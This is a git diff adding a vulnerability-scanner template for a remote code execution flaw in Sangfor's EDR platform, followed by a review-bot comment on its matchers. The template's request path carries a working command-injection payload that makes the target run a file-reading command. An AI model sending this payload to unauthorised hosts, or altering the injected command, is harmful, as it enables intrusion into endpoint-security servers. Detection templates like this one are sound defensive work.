diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml
new file mode 100644
index 0000000000..690f94e80f
--- /dev/null
+++ b/cnvd/2020/CNVD-2020-46552.yaml
@@ -0,0 +1,25 @@
+id: CNVD-2020-46552
+info:
+ name: Sangfor EDR Tool - Remote Code Execution
+ author: ritikchaddha
+ severity: critical
+ description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host.
+ reference:
+ - https://www.modb.pro/db/144475
+ - https://blog.csdn.net/bigblue00/article/details/108434009
+ - https://cn-sec.com/archives/721509.html
+ tags: cnvd,cnvd2020,sangfor,rce
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "$show_input = function($info)")'
+ - 'contains(body, "$strip_slashes($host)")'
+ - 'contains(body, "Log Helper")'
+ - 'status_code == 200'
+ condition: and
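Review bot: The `info` block rates the finding critical but has no `remediation` field, so a hit gives the operator no next step; add one after `description`, e.g. `remediation: <vendor-fixed version or advisory reference, not stated in this template>`. The `dsl` matchers are also undocumented: a comment above them such as `# body must contain c.php's own PHP source, which is only returned when the injected read command ran` would explain why the three `contains` strings were chosen. The same strings would presumably also appear if the server returned c.php uninterpreted (for instance a broken PHP handler), which is source disclosure rather than command execution, so the matcher may over-report at critical severity in that case. It is worth confirming this against a host that serves the file statically, and tightening the match to something only the command output adds.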